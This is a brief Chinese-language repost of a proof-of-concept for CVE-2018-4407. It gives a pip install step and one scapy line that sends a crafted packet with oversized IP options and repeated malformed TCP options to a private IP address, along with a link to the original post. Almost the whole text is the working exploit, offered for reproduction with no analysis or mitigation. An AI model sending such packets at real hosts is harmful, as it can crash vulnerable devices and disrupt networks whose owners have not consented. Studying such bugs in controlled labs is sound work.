CVE-2018-4407 漏洞复现POC

pip install scapy

  

import scapy
from scapy.all import *

send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))

  

原文地址:https://www.cnblogs.com/EEEE1/p/9889048.html